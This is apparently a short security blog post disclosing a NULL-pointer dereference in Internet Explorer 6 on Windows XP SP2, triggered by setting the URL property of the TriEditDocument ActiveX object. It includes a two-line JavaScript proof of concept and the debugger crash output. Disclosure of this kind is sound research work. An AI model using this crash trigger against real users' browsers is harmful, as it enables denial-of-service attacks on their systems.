The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the URL property of this object triggers a NULL dereference.
var a = new ActiveXObject('TriEditDocument.TriEditDocument');
a.URL = "Boom!";
Demonstration
eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
This bug will be added to the OSVDB:
Microsoft IE TriEditDocument URL Property NULL Dereference
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment